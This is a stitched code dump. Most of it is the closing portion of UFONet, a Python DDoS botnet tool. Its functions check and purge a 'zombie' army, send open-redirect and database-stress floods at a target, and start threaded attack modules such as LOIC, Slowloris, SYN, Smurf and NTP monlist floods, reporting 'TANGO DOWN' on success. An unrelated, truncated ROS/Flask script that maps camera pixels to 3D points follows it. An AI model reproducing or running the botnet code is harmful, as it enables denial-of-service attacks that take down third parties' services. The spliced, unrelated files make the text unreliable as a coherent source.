self.update_scanner_stats(self.scanned_zombies) # update json file with scanner stats (found via dorking)
else:
print('-'*25 + "\n")
print('='*24)
print("Working [Zombies]:", num_active_zombies)
print('='*24)
print("\n[Info] [AI] [Zombies] aren't replying to your HTTP HEAD requests! -> [Exiting!]\n")
def testing_all(self):
# test whole botnet
print ("\nChecking if [Zombies] are still infected (WARNING: this may take serveral time!)\n")
print('='*35)
zombies = self.extract_zombies()
rpcs = self.extract_rpcs()
aliens = self.extract_aliens()
droids = self.extract_droids()
ucavs = self.extract_ucavs()
try:
botnet = zombies + rpcs + aliens + droids + ucavs
tested_zombies = zombies + rpcs # test types supported: zombies + xml-rpcs
except:
return
zombies_ready, num_waiting_zombies, num_disconnected_zombies = self.testing(zombies)
rpcs_ready, num_active_rpcs, num_failed_rpcs = self.testing_rpcs(rpcs)
print("\n" + '='*52)
print("\n+ Total Botnet:", len(botnet))
print("\n" + '-'*25)
print("\n+ Total Tested:", len(tested_zombies))
print("\n - Zombies :", len(zombies), " [ OK:", str(num_waiting_zombies), "| FAILED:", str(num_disconnected_zombies), "]")
print(" - XML-RPCs:", len(rpcs), " [ OK:", str(num_active_rpcs), "| FAILED:", str(num_failed_rpcs), "]" + "\n")
print('='*52 + '\n')
if num_disconnected_zombies > 0 or num_failed_rpcs > 0:
if not self.options.forceyes:
update_reply = input("[AI] Do you want update your army? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("[AI] "+self.exit_msg+"\n")
return
else:
if num_disconnected_zombies > 0:
self.update_zombies(zombies_ready)
if num_failed_rpcs > 0:
self.update_rpcs(rpcs_ready)
if not self.options.upload:
print("\n[Info] [AI] Botnet updated! -> ;-)\n")
else:
print("[Info] [AI] [Control] ALL tested [Zombies] are working! ;-) -> [Exiting!]\n")
def attacking(self, zombies, target):
# perform a DDoS Web attack using Open Redirect vectors (and other Web Abuse services) as [Zombies]
if self.options.forcessl:
if target.startswith("http://"):
target = target.replace("http://", "https://") # force SSL/TLS
if target.startswith("http://") or target.startswith("https://"):
print("Attacking:", target)
print('='*55, "\n")
# send Open Redirect injection (multiple zombies > one target url)
reply = self.injection(target, zombies)
else:
print("\n[Error] [AI] Target not valid: "+target+" -> [Discarding!]\n")
def aiming_extra_weapons(self, target, proxy, loic, loris, ufosyn, spray, smurf, fraggle, xmas, ufoack, uforst, droper, overlap, pinger, ufoudp, nuke, tachyon, monlist, sniper):
# perform some other extra attacks (such as DoS techniques)
time.sleep(2) # aiming (multi-threading flow time compensation)
if loic:
try:
self.options.loic = int(loic)
except:
self.options.loic = 100 # default LOIC requests
if self.options.loic < 1:
self.options.loic = 100
self.instance = LOIC() # instance main class for LOIC operations
self.t1 = threading.Thread(target=self.instance.attacking, args=(target, self.options.loic, proxy)) # LOIC using threads + proxy
self.t1.daemon = True # extra weapons are threaded as daemons
self.t1.start()
self.update_loic_stats() # add new LOIC attack to mothership stats
if loris:
try:
self.options.loris = int(loris)
except:
self.options.loris = 101 # default LORIS requests (apache -> max_clients: ~100 | nginx -> no limit (other method))
if self.options.loris < 1:
self.options.loris = 101
self.instance = LORIS() # instance main class for LORIS operations
self.t2 = threading.Thread(target=self.instance.attacking, args=(target, self.options.loris)) # LORIS using threads
self.t2.daemon = True
self.t2.start()
self.update_loris_stats() # add new LORIS attack to mothership stats
if ufosyn:
try:
self.options.ufosyn = int(ufosyn)
except:
self.options.ufosyn = 100 # default UFOSYN requests
if self.options.ufosyn < 1:
self.options.ufosyn = 100
self.instance = UFOSYN() # instance main class for UFOSYN operations
self.t3 = threading.Thread(target=self.instance.attacking, args=(target, self.options.ufosyn)) # UFOSYN using threads
self.t3.daemon = True
self.t3.start()
self.update_ufosyn_stats() # add new UFOSYN attack to mothership stats
if spray:
try:
self.options.spray = int(spray)
except:
self.options.spray = 100 # default SPRAY requests
if self.options.spray < 1:
self.options.spray = 100
self.instance = SPRAY() # instance main class for SPRAY operations
self.t4 = threading.Thread(target=self.instance.attacking, args=(target, self.options.spray)) # SPRAY using threads
self.t4.daemon = True
self.t4.start()
self.update_spray_stats() # add new SPRAY attack to mothership stats
if smurf:
try:
self.options.smurf = int(smurf)
except:
self.options.smurf = 101 # default SMURF requests
if self.options.smurf < 1:
self.options.smurf = 101
self.instance = SMURF() # instance main class for SMURF operations
self.t5 = threading.Thread(target=self.instance.attacking, args=(target, self.options.smurf)) # SMURF using threads
self.t5.daemon = True
self.t5.start()
self.update_smurf_stats() # add new SMURF attack to mothership stats
if xmas:
try:
self.options.xmas = int(xmas)
except:
self.options.xmas = 101 # default XMAS requests
if self.options.xmas < 1:
self.options.xmas = 101
self.instance = XMAS() # instance main class for XMAS operations
self.t6 = threading.Thread(target=self.instance.attacking, args=(target, self.options.xmas)) # XMAS using threads
self.t6.daemon = True
self.t6.start()
self.update_xmas_stats() # add new XMAS attack to mothership stats
if nuke:
if sys.platform == "linux" or sys.platform == "linux2":
try:
self.options.nuke = int(nuke)
except:
self.options.nuke = 10000 # default NUKE requests
if self.options.nuke < 1:
self.options.nuke = 10000
self.instance = NUKE() # instance main class for NUKE operations
self.t7 = threading.Thread(target=self.instance.attacking, args=(target, self.options.nuke)) # NUKE using threads
self.t7.daemon = True # extra weapons are threaded as daemons
self.t7.start()
self.update_nuke_stats() # add new NUKE attack to mothership stats
else:
print("\n[Info] [AI] Your OS cannot perform this attack... -> [Passing!]\n")
if tachyon:
try:
self.options.tachyon = int(tachyon)
except:
self.options.tachyon = 1000 # default TACHYON requests
if self.options.tachyon < 1:
self.options.tachyon = 1000
self.instance = TACHYON() # instance main class for TACHYON operations
self.t8 = threading.Thread(target=self.instance.attacking, args=(target, self.options.tachyon)) # TACHYON using threads
self.t8.daemon = True
self.t8.start()
self.update_tachyon_stats() # add new TACHYON attack to mothership stats
if monlist:
try:
self.options.monlist = int(monlist)
except:
self.options.monlist = 1000 # default MONLIST requests
if self.options.monlist < 1:
self.options.monlist = 1000
self.instance = MONLIST() # instance main class for MONLIST operations
self.t9 = threading.Thread(target=self.instance.attacking, args=(target, self.options.monlist)) # MONLIST using threads
self.t9.daemon = True
self.t9.start()
self.update_monlist_stats() # add new MONLIST attack to mothership stats
if ufoack:
try:
self.options.ufoack = int(ufoack)
except:
self.options.ufoack = 101 # default UFOACK requests
if self.options.ufoack < 1:
self.options.ufoack = 101
self.instance = UFOACK() # instance main class for UFOACK operations
self.t10 = threading.Thread(target=self.instance.attacking, args=(target, self.options.ufoack)) # UFOACK using threads
self.t10.daemon = True
self.t10.start()
self.update_ufoack_stats() # add new UFOACK attack to mothership stats
if uforst:
try:
self.options.uforst = int(uforst)
except:
self.options.uforst = 101 # default UFORST requests
if self.options.uforst < 1:
self.options.uforst = 101
self.instance = UFORST() # instance main class for UFORST operations
self.t11 = threading.Thread(target=self.instance.attacking, args=(target, self.options.uforst)) # UFORST using threads
self.t11.daemon = True
self.t11.start()
self.update_uforst_stats() # add new UFORST attack to mothership stats
if droper:
try:
self.options.droper = int(droper)
except:
self.options.droper = 101 # default DROPER requests
if self.options.droper < 1:
self.options.droper = 101
self.instance = DROPER() # instance main class for DROPER operations
self.t12 = threading.Thread(target=self.instance.attacking, args=(target, self.options.droper)) # DROPER using threads
self.t12.daemon = True
self.t12.start()
self.update_droper_stats() # add new DROPER attack to mothership stats
if overlap:
try:
self.options.overlap = int(overlap)
except:
self.options.overlap = 101 # default OVERLAP requests
if self.options.overlap < 1:
self.options.overlap = 101
self.instance = OVERLAP() # instance main class for OVERLAP operations
self.t13 = threading.Thread(target=self.instance.attacking, args=(target, self.options.overlap)) # OVERLAP using threads
self.t13.daemon = True
self.t13.start()
self.update_overlap_stats() # add new OVERLAP attack to mothership stats
if pinger:
try:
self.options.pinger = int(pinger)
except:
self.options.pinger = 101 # default PINGER requests
if self.options.pinger < 1:
self.options.pinger = 101
self.instance = PINGER() # instance main class for PINGER operations
self.t14 = threading.Thread(target=self.instance.attacking, args=(target, self.options.pinger)) # PINGER using threads
self.t14.daemon = True
self.t14.start()
self.update_pinger_stats() # add new PINGER attack to mothership stats
if ufoudp:
try:
self.options.ufoudp = int(ufoudp)
except:
self.options.ufoudp = 101 # default UFOUDP requests
if self.options.ufoudp < 1:
self.options.ufoudp = 101
self.instance = UFOUDP() # instance main class for UFOUDP operations
self.t15 = threading.Thread(target=self.instance.attacking, args=(target, self.options.ufoudp)) # UFOUDP using threads
self.t15.daemon = True
self.t15.start()
self.update_ufoudp_stats() # add new UFOUDP attack to mothership stats
if fraggle:
try:
self.options.fraggle = int(fraggle)
except:
self.options.fraggle = 101 # default FRAGGLE requests
if self.options.fraggle < 1:
self.options.fraggle = 101
self.instance = FRAGGLE() # instance main class for FRAGGLE operations
self.t16 = threading.Thread(target=self.instance.attacking, args=(target, self.options.fraggle)) # FRAGGLE using threads
self.t16.daemon = True
self.t16.start()
self.update_fraggle_stats() # add new FRAGGLE attack to mothership stats
if sniper:
try:
self.options.sniper = int(sniper)
except:
self.options.sniper = 101 # default SNIPER requests
if self.options.sniper < 1:
self.options.sniper = 101
self.instance = SNIPER() # instance main class for SNIPER operations
self.t17 = threading.Thread(target=self.instance.attacking, args=(target, self.options.sniper)) # SNIPER using threads
self.t17.daemon = True
self.t17.start()
self.update_sniper_stats() # add new SNIPER attack to mothership stats
def stressing(self, target, zombie):
# perform a DDoS Web attack against a target, requesting records on target's database
options = self.options
db_input = self.options.dbstress
def random_key(length):
key = ''
for i in range(length):
key += random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits)
return key
# generating random alphanumeric queries
if self.db_flash > 9: # set db flash start on: 10
length = 1024 # search a heavy random length query (db flash): 1024
self.db_flash = 0 # reset db flash counter
else:
length = 1 # search for one different (alphanumeric) character each time will produces more positive results on db
key = str(random_key(length))
if self.db_flash > 9:
print("[Info] [AI] [DBStress] Trying database request to: " + db_input + " | Query used: db flash! " + "(" + str(length) + " chars)")
else:
print("[Info] [AI] [DBStress] Trying database request to: " + db_input + " | Query used: " + key)
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if not target.endswith('/'): # add "/" to end of target
target = target + "/"
url = zombie + target + db_input + key
req = urllib.request.Request(url, None, headers)
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
try:
req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
except urllib.error.HTTPError as e:
if e.code == 401:
print('[Info] [AI] [DBStress] Not authorized')
elif e.code == 404:
print('[Info] [AI] [DBStress] Not found')
elif e.code == 503:
print('[Info] [AI] [DBStress] Service unavailable')
else:
print('[Info] [AI] [DBStress] Unknown error')
else:
print('[Info] [AI] [DBStress] Database query: HIT!')
def attackme(self, zombies):
# perform a DDoS Web attack against yourself
print("[AI] Starting local port to listening at: " + self.port + "\n")
print('='*21 + "\n")
self.doll=Doll(self)
self.doll.start()
while not self.doll._armed:
time.sleep(1)
# send Open Redirect injection (multiple zombies-multiple target urls)
target = ""
self.injection(target, zombies)
self.doll.shutdown()
self.doll.join()
self.herd.list_fails()
def check_target_status(self):
if self.num_is_down > 0 and self.num_is_up == 0: # check for: 1 or more down, 0 up
print("\n[Info] [AI] Congratulations!! -> [Target looks OFFLINE!]\n")
if not self.options.forceyes:
update_reply = input("[AI] Do you want to send a [HEAD] check request? (y/N)")
print("\n" + '-'*25)
else:
update_reply = "N"
if update_reply == "y" or update_reply == "Y":
try: # send HEAD connection
self.head = True
reply = self.connect_zombie(target)
self.head = False
if reply:
print("\n[Info] [AI] [Control] Target has replied you! -> [Keep shooting!]\n")
else:
print("\n[Info] [AI] " + target + " -> [TANGO DOWN!!!]\n")
self.update_targets_crashed() # update targets crashed stats
self.update_mothership_stats() # update mothership completed attack stats
except Exception:
print("\n[Error] [AI] Something wrong with your connection!...\n")
if DEBUG == True:
traceback.print_exc()
return
else:
print("\n[Info] [AI] " + target + " -> [TANGO DOWN!!!]\n")
self.update_targets_crashed() # update targets crashed stats
self.update_mothership_stats() # update mothership completed attack stats
return
def starting_target_check(self, target, head_check):
options = self.options
head_check_here = False
head_check_external = False
if options.disablehead: # check at start is disabled (skipping!)
print("[Info] [AI] Skipping external check...\n")
head_check_here = True
head_check_external = True
else:
if head_check:
if not options.attackme:
print("[AI] Launching: 'Is target up?' check...\n")
try: # send HEAD connection
self.head = True
reply = self.connect_zombie(target)
self.head = False
if reply:
print("[Info] [AI] [Control] From YOU: YES -> ["+str(reply)+"-OK]")
head_check_here = True
else:
print("[Info] [AI] [Control] From YOU: NO -> [Target looks OFFLINE!]")
head_check_here = False
except Exception:
print("[Error] [AI] [Control] From YOU: NO -> [Cannot connect!]")
if DEBUG == True:
traceback.print_exc()
head_check_here = False
else: # check if local IP/PORT is listening on mothership
print("[AI] Launching: 'Is NAT ready?' check...\n")
try:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
result = sock.connect_ex(('0.0.0.0',8080))
if result == 0 or result == 110: # black magic
print("[Info] [AI] [Control] Local port: YES | Mothership accesible from -private- IP: http://0.0.0.0:8080")
head_check_here = True
else:
print("[Info] [AI] [Control] Local port: NO | Something goes wrong with your port: 8080")
head_check_here = False
except Exception:
print("[Error] [AI] [Control] Local port: NO | Something wrong checking for open ports...")
if DEBUG == True:
traceback.print_exc()
head_check_here = False
else:
head_check_here = True
# check target using external check services
self.external = True
if not options.attackme:
try:
target = self.parse_url_encoding(target) # parse for proper url encoding
try:
url = self.external_check_service1 + target # check from external service [1]
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, None, headers)
external_reply = urllib.request.urlopen(req, context=self.ctx).read()
if b"returned code 200 OK and is up" in external_reply:
t = urlparse(self.external_check_service1)
name_external1 = t.netloc
print("[Info] [AI] [Control] From OTHERS: YES -> ["+name_external1+"]")
head_check_external = True
except:
url = self.external_check_service2 + target # check from external service [2]
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, None, headers)
try:
req_reply = urllib.request.urlopen(req, context=self.ctx).read()
if b"It's just you" in req_reply:
t = urlparse(self.external_check_service2)
name_external2 = t.netloc
print("[Info] [AI] [Control] From OTHERS: YES -> ["+name_external2+"]")
head_check_external = True
else:
print("[Info] [AI] [Control] From OTHERS: NO -> [Target looks OFFLINE!]")
head_check_external = False
except urllib.error.HTTPError as e:
if e:
print("[Error] [AI] [Control] [ "+ self.external_check_service2 +" ] isn't replying to your requests! -> [Passing!]")
print ("[Info] [AI] [Control] From OTHERS: NO -> [Target looks OFFLINE!]")
head_check_external = False
except Exception:
print("[Error] [AI] [Control] From OTHERS: NO -> [Cannot connect!]")
if DEBUG == True:
traceback.print_exc()
head_check_external = False
else:
try: # check mothership from public ip / NAT using HEAD request
try:
req = urllib.request.Request(str(self.pub_ip+":8080"), method="HEAD")
reply = urllib.request.urlopen(req)
except Exception:
reply = None
if reply:
print("[Info] [AI] [Control] From OTHERS: YES -> [Mothership OK!] -> ["+str(self.pub_ip)+":8080]")
head_check_external = True
else:
print("[Info] [AI] [Control] From OTHERS: NO -> [Cannot connect!] -> [NAT is failing!]")
head_check_external = False
head_check_here = False # stop attack if not public IP available
except Exception:
print("[Error] [AI] [Control] From OTHERS: NO -> [Check failed!]")
head_check_here = False # stop attack if not public IP available
if DEBUG == True:
traceback.print_exc()
head_check_external = False
self.external = False
return head_check_here, head_check_external
def injection(self, target, zombies, head_check = True):
options = self.options
# check target's integrity at start
head_check_here, head_check_external = self.starting_target_check(target, head_check)
# ask user to confirm the attack
if head_check_here == True or head_check_external == True:
if not self.options.forceyes:
if not options.attackme:
if not options.disablehead:
start_reply = input("\n[AI] Target is ONLINE!. Do you want to start an attack? (y/N)\n")
else:
start_reply = input("[AI] Do you want to start an attack, directly? (y/N)\n")
else:
if not options.disablehead:
start_reply = input("\n[AI] Mothership is READY!. Do you want to start an attack 'against yourself'? (y/N)\n")
else:
start_reply = input("[AI] Do you want to start an attack 'against yourself', directly? (y/N)\n")
else:
start_reply = "Y"
if start_reply == "y" or start_reply == "Y":
if options.attackme:
total_rounds = 2 # default rounds for attackme
else:
total_rounds = options.rounds # extract number of rounds
try:
total_rounds = int(total_rounds)
except:
total_rounds = 1
if not total_rounds:
total_rounds = 1
if total_rounds <= 0:
total_rounds = 1
self.herd.cleanup()
num_round = 1
num_hits = 0
num_zombie = 1
# start to attack the target with [MODS]
if options.loic or options.loris or options.ufosyn or options.spray or options.smurf or options.fraggle or options.xmas or options.ufoack or options.uforst or options.droper or options.overlap or options.pinger or options.ufoudp or options.nuke or options.tachyon or options.monlist or options.sniper:
ex = threading.Thread(target=self.aiming_extra_weapons, args=(target, self.options.proxy, self.options.loic, self.options.loris, self.options.ufosyn, self.options.spray, self.options.smurf, self.options.fraggle, self.options.xmas, self.options.ufoack, self.options.uforst, self.options.droper, self.options.overlap, self.options.pinger, self.options.ufoudp, self.options.nuke, self.options.tachyon, self.options.monlist, self.options.sniper)) # multithreading flow for extra attacks
ex.daemon = True # extra weapons are threaded as daemons
ex.start()
# start to attack the target with [ARMY]
zombies = self.extract_zombies() # extract zombies from file
if zombies:
self.total_zombie = len(zombies)
else:
self.total_zombie = 0
return
self.herd=Herd(self)
if not self.options.disablepurge:
self.discardzombies = []
self.discard_aliens = []
self.discard_droids = []
self.discard_rpcs = []
self.discard_ucavs = []
total_disc_zombies = 0
self.num_discard_zombies = 0
self.num_discard_aliens = 0
self.num_discard_droids = 0
self.num_discard_rpcs = 0
self.num_discard_ucavs = 0
self.empty_zombies = False
for i in range(0, int(total_rounds)): # start attacking using rounds
print ("\x1b[2J\x1b[H")# clear screen (black magic)
print('='*42)
print('Starting round:', num_round, ' of ', total_rounds)
print('='*42)
self.herd.reset()
self.extra_zombies_lock = True
self.total_zombies_failed_connection = 0 # reset failed [Zombies] connection counter each round
self.send_zombies(zombies) # send [Zombies]
if not self.options.attackme:
if not self.options.disablealiens or not self.options.disabledroids or not self.options.disablerpcs or not self.options.disableucavs:
if self.options.verbose:
print("[Info] [AI] [Control] All [Zombies] have returned for this round... -> [Waiting!]")
self.send_extra_zombies() # send [ARMY]
while self.extra_zombies_lock == True:
time.sleep(1) # wait for [ARMY] to return
if self.options.verbose:
print("\n" + '='*42)
print("\n[Info] [AI] [Control] Full [ARMY] has returned for this round! -> [Refolding!]")
else:
zombies_lock = 0
if self.options.expire: # set timing for purge
try:
timing = int(self.options.expire)
except:
timing = self.expire_timing # default timing for purge
else:
timing = self.expire_timing # default timing for purge
if timing < 1:
timing = self.expire_timing # default timing for purge
zombies_arrival_timing = timing # timing = trying to control round time for threading flow
while self.herd.no_more_zombies() == False: # waiting for [Zombies] to return
zombies_lock = zombies_lock + 1
if zombies_lock > zombies_arrival_timing: # execute main abandoning routine!
if self.options.verbose:
print("[Info] [AI] [Control] Return time set [~"+str(zombies_arrival_timing)+"] for [Zombies] is over! -> [Expiring!]")
break
else:
time.sleep(1)
if self.options.verbose:
print("\n" + '='*42)
print("\n[Info] [AI] [Control] All [Zombies] have returned for this round! -> [Refolding!]")
if not self.options.attackme and not self.options.disableucavs: # check for target's status returned by [UCAVs]
self.check_target_status()
if not self.options.attackme and not self.options.disablepurge: # enable [Zombies] purge round check
self.abandoning_zombies() # check for abandoning zombies
for zombie in self.herd.done: # check for num hits
if self.herd.connection_failed(zombie) == False:
num_hits = num_hits + 1
num_zombie = num_zombie + 1
if num_zombie > self.total_zombie:
num_zombie = 1
if not self.options.attackme and not self.options.disablescanner: # perform a broadband test on target
check_is_loading = self.check_is_loading(target)
self.herd.dump_html()
if not self.options.disablepurge:
if self.empty_zombies == True:
break # exit routine when not any more zombies
num_round = num_round + 1
if self.options.verbose:
print("\n" + '='*42)
print("\n[Info] [AI] This battle is over! -> [Reporting!]")
if self.options.loic: # try to stop daemons/threads for extra weapons
self.t1.join()
if self.options.loris:
self.t2.join()
if self.options.ufosyn:
self.t3.join()
if self.options.spray:
self.t4.join()
if self.options.smurf:
self.t5.join()
if self.options.xmas:
self.t6.join()
if self.options.nuke:
self.t7.join()
if self.options.tachyon:
self.t8.join()
if self.options.monlist:
self.t9.join()
if self.options.ufoack:
self.t10.join()
if self.options.uforst:
self.t11.join()
if self.options.droper:
self.t12.join()
if self.options.overlap:
self.t13.join()
if self.options.pinger:
self.t14.join()
if self.options.ufoudp:
self.t15.join()
if self.options.fraggle:
self.t16.join()
if self.options.sniper:
self.t17.join()
if self.options.target_list:
self.num_target_list = self.num_target_list - 1 # num_target_list = 0 provokes exit!
print ("\x1b[2J\x1b[H") # black magic
if not self.options.attackme: # show herd results
self.herd.dump()
else: # show doll results
print('='*21)
print("\n[Info] [AI] Mothership transmission...\n")
num_real_zombies = len(self.doll.real_zombies)
print("[Info] [AI] Total of [Zombies] that are 100% vulnerable to Open Redirect (CWE-601): " + str(num_real_zombies) + "\n")
for z in self.doll.real_zombies: # show only alien verified zombies
for x in z:
print(" - " + str(x))
self.herd.dump_html(True) # show (all) zombies statistics
if not self.options.attackme:
if not self.options.disablepurge:
print("\n[Info] [AI] Report completed! -> [Purging!]\n")
else:
if not options.target_list:
print("\n[Info] [AI] Report completed! -> [Exiting!]\n")
else:
print("\n[Info] [AI] Report completed! -> [OK!]\n")
self.update_mothership_stats() # update mothership stats
if not self.options.disablepurge:
print('='*21+ "\n")
total_disc_zombies = self.num_discard_zombies + self.num_discard_aliens + self.num_discard_droids + self.num_discard_rpcs + self.num_discard_ucavs
if total_disc_zombies > 0 and total_disc_zombies < 2:
print("[Info] [AI] [Control] You have [" + str(total_disc_zombies) + "] unit that isn't working as expected...\n")
elif total_disc_zombies > 1:
print("[Info] [AI] [Control] You have [" + str(total_disc_zombies) + "] units that aren't working as expected...\n")
if self.num_discard_zombies > 0:
print(" + Zombies: ["+ str(self.num_discard_zombies)+"]")
if self.num_discard_aliens > 0:
print(" + Aliens : ["+ str(self.num_discard_aliens)+"]")
if self.num_discard_droids > 0:
print(" + Droids : ["+ str(self.num_discard_droids)+"]")
if self.num_discard_rpcs > 0:
print(" + X-RPCs : ["+ str(self.num_discard_rpcs)+"]")
if self.num_discard_ucavs > 0:
print(" + UCAVs : ["+ str(self.num_discard_ucavs)+"]")
if total_disc_zombies > 0:
if not self.options.forceyes:
if total_disc_zombies > 0 and total_disc_zombies < 2:
backup_reply = input("\n[AI] Do you want to purge it from your files? (Y/n)\n")
elif total_disc_zombies > 1:
backup_reply = input("\n[AI] Do you want to purge them from your files? (Y/n)\n")
else:
backup_reply = "Y"
if backup_reply == "y" or backup_reply == "Y":
print("\n[Info] [AI] Purging failed units from files...\n")
discarded = []
if self.num_discard_zombies > 0:
for z in self.discardzombies:
discarded.append(z)
print(" + [Info] [Zombies] "+z+" -> [Purged!]")
if self.num_discard_aliens > 0:
for a in self.discard_aliens:
discarded.append(a)
print(" + [Info] [Aliens] "+a+" -> [Purged!]")
if self.num_discard_droids > 0:
for d in self.discard_droids:
discarded.append(d)
print(" + [Info] [Droids] "+d+" -> [Purged!]")
if self.num_discard_rpcs > 0:
for r in self.discard_rpcs:
discarded.append(r)
print(" + [Info] [X-RPCs] "+r+" -> [Purged!]")
if self.num_discard_ucavs > 0:
for u in self.discard_ucavs:
discarded.append(u)
print(" + [Info] [UCAVs] "+u+" -> [Purged!]")
disc_zombies = self.discard_zombies(discarded) # discard zombies (remove from files)
if disc_zombies > 0 and disc_zombies < 2:
print("\n[Info] [AI] You have removed ["+str(disc_zombies)+"] unit! -> [OK!]\n")
elif disc_zombies > 1:
print("\n[Info] [AI] You have removed ["+str(disc_zombies)+"] units! -> [OK!]\n")
if not self.options.target_list:
print('-'*21+ "\n")
print("[AI] "+self.exit_msg+"\n")
if not self.options.web:
return
else:
if self.num_target_list > 0: # still more targets
print('-'*21+ "\n")
print("[Info] [AI] Attack against: "+str(target)+" -> [Finished!]\n")
return
else: # finish attack from multiple targets
print('-'*21+ "\n")
print("[Info] [AI] Attack against: "+str(target)+" -> [Finished!]")
print("\n"+ '='*21+ "\n")
print("[Info] [AI] All your battles have ended! -> [Exiting!]")
print("\n"+ '-'*21+ "\n")
print("[AI] "+self.exit_msg+"\n")
if not self.options.web:
return
else:
if num_real_zombies < 1: # not any 100% vulnerable zombie found
print("\n[Info] [AI] [Control] Not any 100% vulnerable zombie found! -> [Exiting!]\n")
if os.path.exists('mothership') == True:
os.remove('mothership') # remove mothership stream
if os.path.exists('alien') == True:
os.remove('alien') # remove random alien worker
if not options.web:
sys.exit(2) # exit
else:
return
else:
print("\n" + '='*21)
AI_reply = input("\n[AI] Do you prefer a 'fortune' cookie instead? (y/N)\n")
if AI_reply == "y" or AI_reply == "Y":
self.AI() # AI fortune cookie
print('-'*21+ "\n")
print("\n[AI] "+self.exit_msg+"\n")
if os.path.exists('mothership') == True:
os.remove('mothership') # remove mothership stream
if os.path.exists('alien') == True:
os.remove('alien') # remove random alien worker
if not options.web:
sys.exit(2) # exit
else:
return
else:
if not options.attackme:
print("\n[Info] [AI] "+target+" -> [Target looks OFFLINE!]")
else:
print("\n[Error] [AI] NAT is not working correctly! -> [Exiting!]")
print("\n" + '-'*21)
print("\n[AI] "+self.exit_msg+"\n")
if os.path.exists('mothership') == True:
os.remove('mothership') # remove mothership stream
if os.path.exists('alien') == True:
os.remove('alien') # remove random alien worker
return
if __name__ == "__main__":
app = UFONet()
options = app.create_options()
if options:
app.run()
|
move_arm_to_pixel.py
|
#!/usr/bin/env python
import io
import os
import threading
import time
import json
from copy import deepcopy
import rospy
import rospkg
from flask import Flask, request
from flask import render_template, send_file, redirect, url_for
from std_msgs.msg import Header
from sensor_msgs.msg import Image
from geometry_msgs.msg import PointStamped
from cv_bridge import CvBridge, CvBridgeError
import cv2
import numpy as np
import tf
import tf2_ros
from calibration.calibration_arm_control_client import ArmControlClient
print(ArmControlClient)
from easy_handeye.handeye_client import HandeyeClient
app = Flask(__name__)
app.debug = True
# Run ros node on different thread than flask
# threading.Thread(target=lambda: rospy.init_node('test_node', disable_signals=True)).start()
rospy.init_node('test_move_gui_server')
################################
# Setup camera topic
camera_topic = rospy.get_param('camera_topic', '/camera/color/image_raw')
depth_topic = rospy.get_param('depth_topic', '/camera/aligned_depth_to_color/image_raw')
source_frame = None
listener = tf.TransformListener()
target_frame = rospy.get_param('target_frame', 'ar_marker_2')
rgb_img = None
rgb_img_lock = threading.Lock()
depth_img = None
depth_img_lock = threading.Lock()
def rgb_img_callback(data):
img_data = CvBridge().imgmsg_to_cv2(data, "bgr8")
rgb_img_lock.acquire()
global source_frame
global rgb_img
source_frame = data.header.frame_id
rgb_img = deepcopy(img_data)
rgb_img_lock.release()
def depth_img_callback(data):
img_data = CvBridge().imgmsg_to_cv2(data, "passthrough")
depth_img_lock.acquire()
global depth_img
depth_img = deepcopy(img_data)
depth_img_lock.release()
rospy.Subscriber(camera_topic, Image, rgb_img_callback, queue_size=1)
rospy.Subscriber(depth_topic, Image, depth_img_callback, queue_size=1)
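# queue_size=1 keeps only the most recent message per topic, so the Flask handlers
# below always serve the latest camera frame rather than working through a backlog.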
def point_msg(p, frame_id):
ps = PointStamped()
ps.point.x = p[0]
ps.point.y = p[1]
ps.point.z = p[2]
ps.header = Header()
ps.header.stamp = rospy.Time.now()
ps.header.frame_id = frame_id
return ps
@app.route('/')
def index():
rv = render_template('move.html')
a = request.args.get('')
# ps = point_msg([0, 1, 2], 'base_link')
# print(ps)
return rv
# return 'hello'
intrinsic_mat = [926.739013671875, 0.0, 625.3572387695312, 0.0, 0.0, 925.6869506835938, 350.6984558105469, 0.0, 0.0, 0.0, 1.0, 0.0]
intrinsic_mat = np.array(intrinsic_mat).reshape(3, 4)
intrinsic_mat = intrinsic_mat[:3, :3]
intrinsic_mat_inv = np.linalg.inv(intrinsic_mat)
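# The hard-coded values above appear to be a flattened 3x4 projection matrix (P) taken
# from a sensor_msgs/CameraInfo message; only its left 3x3 intrinsic block K is kept.
# K^-1 is used in /move for pinhole back-projection: [X, Y, Z] = depth * K^-1 * [u, v, 1].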
# Reference:
# https://answers.ros.org/question/146111/tf-python-api-transform-points/
@app.route('/move')
def move():
q = request.query_string
try:
x, y = q.split(',')
x = int(x)
y = int(y)
except Exception as e:
return str(e)
with rgb_img_lock:
with depth_img_lock:
if rgb_img is None:
return 'No image'
if depth_img is None:
return 'No depth image'
assert x < rgb_img.shape[1]
assert y < rgb_img.shape[0]
xy_one = [x, y, 1]
z = depth_img[y, x] / 1e3
xyz = np.dot(intrinsic_mat_inv, xy_one) * z
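# xyz is the back-projected 3D point in the color camera's optical frame; it is wrapped
# in a PointStamped below and transformed into the 'ar_marker_2' frame via tf.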
msg = point_msg(xyz, source_frame)
print(msg)
now = rospy.Time.now()
listener.waitForTransform('ar_marker_2', source_frame, now, rospy.Duration(10))
ar_tf = listener.lookupTransform(source_frame, 'ar_marker_2', rospy.Time())
t = listener.getLatestCommonTime("ar_marker_2", source_frame)
new_msg = listener.transformPoint('ar_marker_2', msg)
return str(ar_tf) + '<br />' + str(xyz) + '<br />' + str([new_msg.point.x, new_msg.point.y, new_msg.point.z])
return ''
@app.route('/rgb_image.png')
def get_rgb_image():
# Get image from ros topic
rgb_img_lock.acquire()
global rgb_img
if rgb_img is None:
rgb_img_lock.release() # release the lock on the early-return path so it is not left held
return ''
rv, buffer = cv2.imencode('.png', rgb_img)
img_file = io.BytesIO(buffer)
rv = send_file(img_file, attachment_filename='rgb.png', mimetype='image/png')
rgb_img_lock.release()
return rv
@app.route('/depth_image.png')
